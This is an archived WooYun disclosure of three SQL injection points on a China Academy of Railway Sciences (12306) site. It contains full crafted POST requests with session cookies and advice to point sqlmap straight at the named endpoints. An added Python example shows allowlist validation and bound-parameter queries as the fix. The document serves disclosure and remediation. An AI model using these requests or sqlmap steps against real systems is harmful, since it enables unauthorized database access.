WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
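2014-05-06: Details reported to the vendor; awaiting vendor response
2014-05-06: Vendor confirmed; details disclosed to the vendor only
2014-05-16: Details disclosed to core white hats and relevant domain experts
2014-05-26: Details disclosed to regular white hats
2014-06-05: Details disclosed to intern white hats
2014-06-20: Details disclosed to the public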
China Academy of Railway Sciences (12306): multiple SQL injection vulnerabilities
China Academy of Railway Sciences
Injection point: hyfw.12306.cn/hyinfo/action/JgxxAction_jsjjfl
Constructed request:
POST /hyinfo/action/JgxxAction_jsjjfl HTTP/1.1
Host: hyfw.12306.cn
Proxy-Connection: keep-alive
Content-Length: 6
Accept: */*
Origin: http://hyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: TVvHsVfkbo=MDAwM2IyOWE2NjgwMDAwMDAwMDIwFnwgVT8xMzk5MzMyNjQw; JSESSIONID=3cyKTnzdgfCC1kvQD0plHnsHt0cvHXDKgXBJBfrpD5Xm91VjnTtL!182003097; JhVfuvhdaD=MDAwM2IyOWFhMDAwMDAwMDAwMDgwCx1OITUxMzk5MzI5NzE2; 0Bnf0WSH3k=MDAwM2IyNTNkYjAwMDAwMDAwMjIwRFUvU1UxMzk5MzMxMDc5

lx=jzx
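Feeding this straight into sqlmap is enough to exploit the injection.

Second SQL injection:
Injection point: hyfw.12306.cn/hyinfo/action/JgxxAction_pmplxx
Injection parameter: pm
Constructed request: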
POST /hyinfo/action/JgxxAction_pmplxx HTTP/1.1
Host: hyfw.12306.cn
Proxy-Connection: keep-alive
Content-Length: 46
Accept: */*
Origin: http://hyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: TVvHsVfkbo=MDAwM2IyOWE2NjgwMDAwMDAwMDIwFnwgVT8xMzk5MzMyNjQw; JSESSIONID=3cyKTnzdgfCC1kvQD0plHnsHt0cvHXDKgXBJBfrpD5Xm91VjnTtL!182003097; JhVfuvhdaD=MDAwM2IyOWFhMDAwMDAwMDAwMDgwCx1OITUxMzk5MzI5NzE2; 0Bnf0WSH3k=MDAwM2IyNTNkYjAwMDAwMDAwMjIwRFUvU1UxMzk5MzMxMDc5

pl=0260&pm=0110003&plfh=0260&pmfh=0110003&bs=1
sqlmap is enough to exploit this one as well.

Third SQL injection point:
Injection point: http://hyfw.12306.cn/hyinfo/action/JgxxAction_hwyjl?lx=00
Run sqlmap against it directly.
Fix: filtering.
Note: I didn't do anything beyond this; please don't send anyone knocking on my door.
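
The report's remediation is the single word "filtering". As an added example (not code from the report or from the vendor's application), this is one way the server side could handle the form body of the second request: allowlist validation of every field, then a bound-parameter query. The `goods` table, its columns, the digit-only field rules and the SQLite backend are assumptions made for illustration.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumed rule: each field in the second request's body is a short numeric
# code (pl=0260, pm=0110003, ...). Anything else is rejected outright.
FIELD_RULES = {
    "pl": re.compile(r"[0-9]{1,8}"),
    "pm": re.compile(r"[0-9]{1,8}"),
    "plfh": re.compile(r"[0-9]{1,8}"),
    "pmfh": re.compile(r"[0-9]{1,8}"),
    "bs": re.compile(r"[0-9]"),
}

def parse_form(body: str) -> dict:
    """Return validated fields; raise ValueError on unknown, missing,
    duplicated or malformed fields."""
    raw = parse_qs(body, keep_blank_values=True, strict_parsing=True)
    if set(raw) != set(FIELD_RULES):
        raise ValueError("unexpected or missing field")
    clean = {}
    for name, values in raw.items():
        if len(values) != 1 or not FIELD_RULES[name].fullmatch(values[0]):
            raise ValueError(f"invalid value for {name}")
        clean[name] = values[0]
    return clean

def lookup(conn, body: str) -> list:
    """Validate first, then query with bound parameters so user input is
    never concatenated into the SQL text."""
    f = parse_form(body)
    cur = conn.execute(
        "SELECT name FROM goods WHERE pl = ? AND pm = ?", (f["pl"], f["pm"])
    )
    return [row[0] for row in cur.fetchall()]

def demo_db():
    """Constructed in-memory table standing in for the real backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE goods (pl TEXT, pm TEXT, name TEXT)")
    conn.execute("INSERT INTO goods VALUES ('0260', '0110003', 'sample item')")
    return conn

if __name__ == "__main__":
    db = demo_db()
    print(lookup(db, "pl=0260&pm=0110003&plfh=0260&pmfh=0110003&bs=1"))
```

Validation alone is not the defence here; the bound parameters are what keep a value from ever being parsed as SQL, and the allowlist narrows what reaches the query at all.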
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2014-05-06 15:59
Checking.
None yet.